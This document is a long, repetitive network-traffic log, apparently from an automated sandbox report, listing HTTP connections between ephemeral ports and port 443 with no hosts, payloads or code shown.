      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44052
      Source: unknownNetwork traffic detected: HTTP traffic on port 56434 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36434
      Source: unknownNetwork traffic detected: HTTP traffic on port 57404 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40408 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37758
      Source: unknownNetwork traffic detected: HTTP traffic on port 54138 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38208 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44048
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48404
      Source: unknownNetwork traffic detected: HTTP traffic on port 37226 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51410 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56048
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36422
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57386
      Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40076 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37746
      Source: unknownNetwork traffic detected: HTTP traffic on port 54012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36418
      Source: unknownNetwork traffic detected: HTTP traffic on port 41620 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33390
      Source: unknownNetwork traffic detected: HTTP traffic on port 59712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35160 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 52976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46690
      Source: unknownNetwork traffic detected: HTTP traffic on port 35860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36410
      Source: unknownNetwork traffic detected: HTTP traffic on port 37214 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33378
      Source: unknownNetwork traffic detected: HTTP traffic on port 52174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47614 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60140 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44210 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45358
      Source: unknownNetwork traffic detected: HTTP traffic on port 58078 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48468 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33552 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34698
      Source: unknownNetwork traffic detected: HTTP traffic on port 58832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52506 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56078
      Source: unknownNetwork traffic detected: HTTP traffic on port 45306 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56070
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44018
      Source: unknownNetwork traffic detected: HTTP traffic on port 54712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37112 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36232 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48454
      Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57328
      Source: unknownNetwork traffic detected: HTTP traffic on port 42970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44092
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35138
      Source: unknownNetwork traffic detected: HTTP traffic on port 41022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58662
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57332
      Source: unknownNetwork traffic detected: HTTP traffic on port 34612 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57334
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35142
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59992
      Source: unknownNetwork traffic detected: HTTP traffic on port 57174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53066 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45318 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36460
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59998
      Source: unknownNetwork traffic detected: HTTP traffic on port 46848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36466
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35126
      Source: unknownNetwork traffic detected: HTTP traffic on port 58640 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35134
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57344
      Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58670
      Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56010
      Source: unknownNetwork traffic detected: HTTP traffic on port 47638 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47108
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48434
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 46148 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44072
      Source: unknownNetwork traffic detected: HTTP traffic on port 38486 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37780
      Source: unknownNetwork traffic detected: HTTP traffic on port 57162 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36454
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37786
      Source: unknownNetwork traffic detected: HTTP traffic on port 42716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58686
      Source: unknownNetwork traffic detected: HTTP traffic on port 35414 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55350 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35120
      Source: unknownNetwork traffic detected: HTTP traffic on port 57862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45396
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50726
      Source: unknownNetwork traffic detected: HTTP traffic on port 52952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35106
      Source: unknownNetwork traffic detected: HTTP traffic on port 40878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35110
      Source: unknownNetwork traffic detected: HTTP traffic on port 44794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 35388 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47168
      Source: unknownNetwork traffic detected: HTTP traffic on port 47462 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32888 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32900
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39542
      Source: unknownNetwork traffic detected: HTTP traffic on port 57940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39546
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40526
      Source: unknownNetwork traffic detected: HTTP traffic on port 38068 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
      Source: unknownNetwork traffic detected: HTTP traffic on port 33806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35186
      Source: unknownNetwork traffic detected: HTTP traffic on port 41594 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48488
      Source: unknownNetwork traffic detected: HTTP traffic on port 47524 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47156
      Source: unknownNetwork traffic detected: HTTP traffic on port 56500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47152
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
      Source: unknownNetwork traffic detected: HTTP traffic on port 39394 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39532
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
      Source: unknownNetwork traffic detected: HTTP traffic on port 38704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39536
      Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59164
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60140
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35170
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59162
      Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57682 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
      Source: unknownNetwork traffic detected: HTTP traffic on port 43862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44618 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51396 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39524
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60158
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60154
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40508
      Source: unknownNetwork traffic detected: HTTP traffic on port 54788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
      Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35160
      Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46594 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48468
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47132
      Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47130
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36480
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48462
      Source: unknownNetwork traffic detected: HTTP traffic on port 54686 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43162 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56368 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50776
      Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
      Source: unknownNetwork traffic detected: HTTP traffic on port 59544 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32946
      Source: unknownNetwork traffic detected: HTTP traffic on port 58218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59114 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
      Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32940
      Source: unknownNetwork traffic detected: HTTP traffic on port 37758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59108
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59114
      Source: unknownNetwork traffic detected: HTTP traffic on port 36842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42666 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40566
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50788
      Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55616 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32934
      Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36318 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
      Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32924
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50790
      Source: unknownNetwork traffic detected: HTTP traffic on port 53640 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32920
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47182
      Source: unknownNetwork traffic detected: HTTP traffic on port 34980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39566
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59128
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59136
      Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56512 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40542
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
      Source: unknownNetwork traffic detected: HTTP traffic on port 43444 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38642 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59144
      Source: unknownNetwork traffic detected: HTTP traffic on port 37594 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
      Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60202 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32868
      Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55502
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56832
      Source: unknownNetwork traffic detected: HTTP traffic on port 56864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
      Source: unknownNetwork traffic detected: HTTP traffic on port 39608 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40488
      Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55514
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55510
      Source: unknownNetwork traffic detected: HTTP traffic on port 54854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35246 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
      Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43502
      Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40476
      Source: unknownNetwork traffic detected: HTTP traffic on port 52158 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
      Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56858
      Source: unknownNetwork traffic detected: HTTP traffic on port 34252 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44826
      Source: unknownNetwork traffic detected: HTTP traffic on port 53196 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40462
      Source: unknownNetwork traffic detected: HTTP traffic on port 36296 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37278 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54208
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32838
      Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47094
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54206
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56864
      Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55540
      Source: unknownNetwork traffic detected: HTTP traffic on port 37542 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44816
      Source: unknownNetwork traffic detected: HTTP traffic on port 34976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44810
      Source: unknownNetwork traffic detected: HTTP traffic on port 41316 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40454
      Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44890
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43562
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
      Source: unknownNetwork traffic detected: HTTP traffic on port 46226 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48224 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34606
      Source: unknownNetwork traffic detected: HTTP traffic on port 54532 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
      Source: unknownNetwork traffic detected: HTTP traffic on port 58872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
      Source: unknownNetwork traffic detected: HTTP traffic on port 33146 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34598 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58574 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47918
      Source: unknownNetwork traffic detected: HTTP traffic on port 47732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59076
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42226
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59074
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52448
      Source: unknownNetwork traffic detected: HTTP traffic on port 55746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41464 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35924
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60072
      Source: unknownNetwork traffic detected: HTTP traffic on port 44352 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38294 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57068 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33212 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47906
      Source: unknownNetwork traffic detected: HTTP traffic on port 34664 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54142 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59080
      Source: unknownNetwork traffic detected: HTTP traffic on port 60774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34586 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42212
      Source: unknownNetwork traffic detected: HTTP traffic on port 41570 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
      Source: unknownNetwork traffic detected: HTTP traffic on port 46616 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32888
      Source: unknownNetwork traffic detected: HTTP traffic on port 49070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60082
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42204
      Source: unknownNetwork traffic detected: HTTP traffic on port 58884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45622 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43536
      Source: unknownNetwork traffic detected: HTTP traffic on port 38970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52464
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35900
      Source: unknownNetwork traffic detected: HTTP traffic on port 45358 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56820
      Source: unknownNetwork traffic detected: HTTP traffic on port 40646 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52472
      Source: unknownNetwork traffic detected: HTTP traffic on port 43084 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40496
      Source: unknownNetwork traffic detected: HTTP traffic on port 42948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44856
      Source: unknownNetwork traffic detected: HTTP traffic on port 55812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40498
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46630
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47962
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47960
      Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35978
      Source: unknownNetwork traffic detected: HTTP traffic on port 41616 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34646
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58612
